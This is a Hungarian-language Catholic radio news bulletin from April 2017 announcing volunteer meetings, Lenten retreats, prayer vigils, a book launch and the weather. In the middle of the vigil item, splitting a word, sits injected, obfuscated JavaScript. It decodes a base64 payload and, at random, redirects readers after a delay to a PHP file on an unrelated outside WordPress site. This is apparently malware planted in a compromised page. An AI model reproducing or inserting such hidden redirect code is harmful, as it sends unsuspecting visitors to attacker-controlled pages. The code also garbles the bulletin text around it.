2017. április 4. – Hírek és programajánló

H Í R E K   E S T E

Soronkövetkező önkéntestalálkozók
Április 5-én, holnap délután hat órától Nagyváradon, rádiónk stúdiójának kápolnájában szentmise lesz, majd ezt követően elkezdődik a találkozó. Április 6-án, csütörtökön két önkéntestalálkozót tartunk: délelőtt tizenegy órától Marosvásárheleyen a  Deus Providebit Házban, délután fél öt órától pedig Kolozsváron, a Szent Mihály Nőszövetség Szentegyház utcai dísztermében. Végül április 7-én, pénteken délután négy órára Nagykárolyba, a Szent László közösségi házba várjuk önkéntes munkatársainkat.
Buzdítunk mindenkit, jöjjenek el, hogy töltekezzünk a találkozások által. Várjuk azokat is, akik még nem önkéntesei a Mária Rádiónak, de szívükön viselik a közös előrehaladást!

Engesztelő imavirrasztás Székelyudvarhelyen
Az erdélyi Mária Rádió székelyudvarhelyi stúdiójának kápolnájában minden hónap első szerdáján egész éjjel virrasztást tartanak, éjjel tizenegy órától szentmisét mutatnak be. Április 5-én, holnap hívnak együtt imádkozni mindenkit, aki Jézussal szeretne időt tölteni. A virrasztást városukért, egyházközségeikért, a fiatalok testi-lelki tisztaságáért, a családokért, egyedülállókért, a jegyesekért, gyermeket vágyó és váró szülőkért, betegekért, elhunyt szeretteikért, saját magukért és egyéni szándékokra ajánlják az udvarhelyiek.
A kápolnában minden reggel nyolc órától este nyolc óráig állfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó, egész napos szentségimádás van. Várják az Istent imádni, engesztelni vágyókat.

Könyvbemutató Csíkszeredában
Sebestyén Péter marosvásárhelyi plébános és tizenöt kötetes szerző idén ünnepli papságának huszonöt éves jubileumát. Prédikációiból, rádiós előadásaiból, esszéiből összeállított Ezüstbeszéd címmel egy könyvet, amelyet Csíkszeredában mutat be április 5-én. Az író-olvasó találkozó szerdán délután öt órakor kezdődik a Kájoni János Megyei Könyvtárban. A szerzővel Balog László, a Sapientia EMTE Csíkszeredai Egyetem Könyvtárának igazgatója beszélget.

Szerdai párbeszédek Marosvásárhelyen
A Családpasztorációs Központ és a Familia Centrum szervezésében a Szerdai párbeszédek 25. találkozója  április 5-én, holnap este hat órától Marosvásárhelyen, az Ama Deus cukrászdába lesz. Téma a Fénysugarak és árnyak (szenvedés-betegség-felismerés-gyógyulás) Meghívottak dr. Bérczes Judit orvos, Cosma István pszichológus, Salló Zsófia orvos és Magos Gyöngyvér, pasztorálasszisztens.

Szent Rita imakoszorú Kolozsváron
A kolozsvári Piarista templomban  február 9. és május 18. között, csütörtökönként, közvetlenül a reggel kilenc órakor kezdődő szentmise után, a szenvedő Krisztussal egyesülő Casciai Szent Rita, a látszólag lehetetlen ügyek pártfogójának,a nők, a gyermekek és a családok védőszentjének közbenjárásáért imádkoznak. Az imakoszorú május 22-én, hétfőn Szent Rita emléknapján, a délelőtt kilenc órakor (magyar nyelvű) és délután hat órakor (román nyelvű) kezdődő ünnepi szentmise végén imádságos rózsa, illetve virágszenteléssel zárul.

Nagyböjti lelkigyakorlat Kolozsváron
A kolozsvári Szent Mihály-plébániatemplomban április 6-8. között nagyböjti lelkigyakorlat lesz. A délután hat órakor kezdődő szentmisék keretében Darvas Emil kadicsfalvi-bethlenfalvi plébános tartja az elmélkedéseket.

Triduum Székelyudvarhelyen
A székelyudvarhelyi Szent Miklós-egyházközségben április 6–8. között nagyböjti lelkigyakorlatot tartanak. A délután hat órakor kezdődő szentmiséket Benedek Sándor székelyszentléleki plébános mutatja be.

Nagyböjti lelkigyakorlat Déván
A dévai telepi egyházközségben április 6-8. között tartják a magyar nyelvű nagyböjti lelkigyakorlatot, a szentmisék este hét órakor kezdődnek.

Nagyböjti lelkigyakorlat Medgyesen
A medgyesi római-katolikus plébániatemplomban is  április 6-8. között tartják a nagyböjti lelkigyakorlatot, Szőcs Csaba, a kolozsvári verbum Keresztény Kulturális Egyesület igazgatójának vezetésével. Csütörötökön és pénteken este hat, míg szombaton délelőtt tizenegy órakor kezdődnek a szentmisék. Hívják és várják a kedeves híveket!

Misztériumjáték Marosvársárhelyen
Virágvasárnap, április 9-én, délután öt órától, Marosvásárhelyen tanuló és dolgozó fiatalok bemutatják a Jézus Krisztus szenvedéstörténetét megjelenítő misztériumjátékot, a Passiót. A misztériumjáték a Marosvásárhelyi Nemzeti Színház jobb oldalán lévő szabadtéri színpadon kerül bemutatásra. Szeretettel várnak
mindenkit, aki idén a vásárhelyi fiatalokkal együtt szeretné bejárni a Megváltónk szenvedésének útját.

Időjárás: Szerdától ismét számítani kell záporok, helyenként zivatarokra kialakulására, de rövid napos időszakok is lesznek. Északnyugaton erős lehet az északnyugati szél. Napközben 14-19 fok között alakul a hőmérséklet, de a záporokat, zivatarokat követően átmenetileg lehűlhet a levegő.  

MRE - Hírszolgálat, 2017. áprils 4.


H Í R E K   R E G G E L / D É L B E N

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a mai nap folyamán a kőhalmi templomban tartják az örökös szentségimádási napot. Nagyböjt folyamán járuljunk gyakrabban az Oltáriszentségben jelen levő Krisztus elé, engeszteljük Őt bűneinkért és engedjük, hogy jelenléte formáljon, alakítson bennünket.

Nemzetközi tudományos konferencia Gyulafehérváron
Április 5-7. között Gyulafehérváron Nemzetközi tudományos konferencia lesz Septuaginta, inkulturáció és az identitás őrzése címmel – tudtuk meg a RomKat.ro honlapjáról.

Szentségimádás az alsódobói Isteni irgalmasság kápolnában
Minden hónap első csütörtökén szentségimádást tartanak a vágási egyházközség filiájában található alsódobói Isteni Irgalmasság kápolnában. Délután három órakor elimádkozzák az isteni irgalmasság rózsafüzért, majd az örvendetes-, a világosság-, a fájdalmas- és a dicsőséges rózsafüzért. Este hat órakor szentmisét mutatnak be, amely szentségi áldással fejeződik be. Az imaalkalom alatt gyónási lehetőség van. Várják mindazokat, akik mindennap elimádkozzák a rózsafüzért és idejükből tudnak Istennek ajándékozni.

Kneipp vízterápia Csíkszentdomokoson
Sebastian Kneipp német katolikus pap, aki lelkészi hivatását természetgyógyászati tevékenységgel egészítette ki, világhírű vízgyógyászati módszert fejlesztett ki, amit ma Kneipp-kúraként ismerünk. Gyógyító tevékenysége alapján kapott új lendületet a természetgyógyászat. Április 6-án, csütörtökön este hét órától a csíkszentdomokosi Szent Margit Házban a Kneipp vízterápiát bemutatja Imelda ferences nővér, és előadást tart a jótékony, egészségmegőrző hatásairól. Az előadás mindenki számára nyitott, várnak minden érdeklődőt!

Triduum Gyergyószentmiklóson
A gyergyószentmiklósi Szent István-egyházközségben  április 6–8. között háromnapos előkészület lesz húsvétra. A délután hat órakor kezdődő szentmiséken a szentbeszédet Gábos Zoltán málnásfürdői plébános tartja.

Nagyböjti lelkigyakorlat Kolozsváron
A kolozsvári Szent Mihály-plébániatemplomban április 6-8. között nagyböjti lelkigyakorlat lesz. A délután hat órakor kezdődő szentmisék keretében Darvas Emil kadicsfalvi-bethlenfalvi plébános tartja az elmélkedéseket.

Elváltak és újraházasodottak hétvégéje
„Íme, újjáteremtek mindent!” mottóval április 7-8. között szervezik meg a Gyulafehérvári Családpasztorációs Központ munkatársai az elváltak és újraházasodottak hétvégéjét. Helyszín a székelyudvarhelyi Szent Pio Lelkigyakorlatos Ház. A program péntek este hat órakor kezdődik és szombaton vacsorával ér véget. A hétvége részvételi díja: 25lej/fő/hétvége. Bejelentkezni, a szervezők kérésére, ma déli tizenkét óráig lehet a kertesz.maria@csalad.ro e-mail címen, további részletes információk pedig a 0743-152008-as telefonszámon igényelhetők.

Szent László Regionális Találkozó Nagyváradon
Április 6-án, csütörtökön elkezdődik a regionális találkozók sorozata, amit a Nagyváradi Római Katolikus Püspökség kezdeményezett az alapító királyunk szentté avatásának 825. évfordulóján meghirdetett Szent László Évben. Délután fél hat órakor az egyházmegye szívében, a székesegyházban találkoznak a nagyváradi plébániák küldöttségei, illetve a Fugyivásárhelyről, Mezőtelegdről, Köröstarjánból, Újpalotáról és Váradszentmártonból érkező zarándokok.
Az első találkozó témája Szent László és bűnbánatunk. A szent király életpéldáját kiemelve a témához kapcsolódó tanúságtételeket, tapasztalatokat osztanak meg egymással a zarándokok és konkrét irányvonalakat fogalmaznak meg a mai keresztény ember, illetve a plébániaközösségek életében. Az elhangzott tanúságtételeket, javaslatokat, elhatározásokat egy ünnepi dokumentumban összefoglalják, és a találkozó után átadják azt a főpásztornak. A találkozót este fél hét órakor egy Szent László király tiszteletére bemutatott szentmise zárja, melynek főcelebránsa Böcskei László megyés püspök, szónoka pedig Láber Ferenc nagyvárad-őssi plébános.

Pedagógusok lelkinapja Nagyváradon
Április 8-án, szombaton délelőtt tíz órától az Egyházmegyei Laikusképző Központ lelkinapot szervez az egyházmegye katolikus pedagógusai számára a nagyváradi Posticum épületében (Teiului utca 26.) A program moderátora P. Urbán Erik OFM ferences szerzetes lesz.

Motor-áldás Hargitafürdőn
Április 9-én, Virágvasárnap a pálos szerzetesek hívják a motorosokat motorjaik megáldására a Tolvajos tetőre. Délelőtt fél tíz órakor ünnepi szentmise lesz Hargitafürdőn, a Szent István templomban. A szentmisét követően (11 óra körül) megáldják a  motorokat a Hármas keresztnél, a hargitafürdői útelágazásánál.

Időjárás: Mától országszerte számíthatunk záporokra,  többfelé az ég is megdörrenhet, a zivatarokhoz pedig erős, viharos széllökések társulhatnak. Mérséklődik a nappali felmelegedés, délután 13 és 21 fok között alakulhat a hőmérséklet. 

MRE - Hírszolgálat, 2017. áprils 4.

About the author

maradmin

Leave a Comment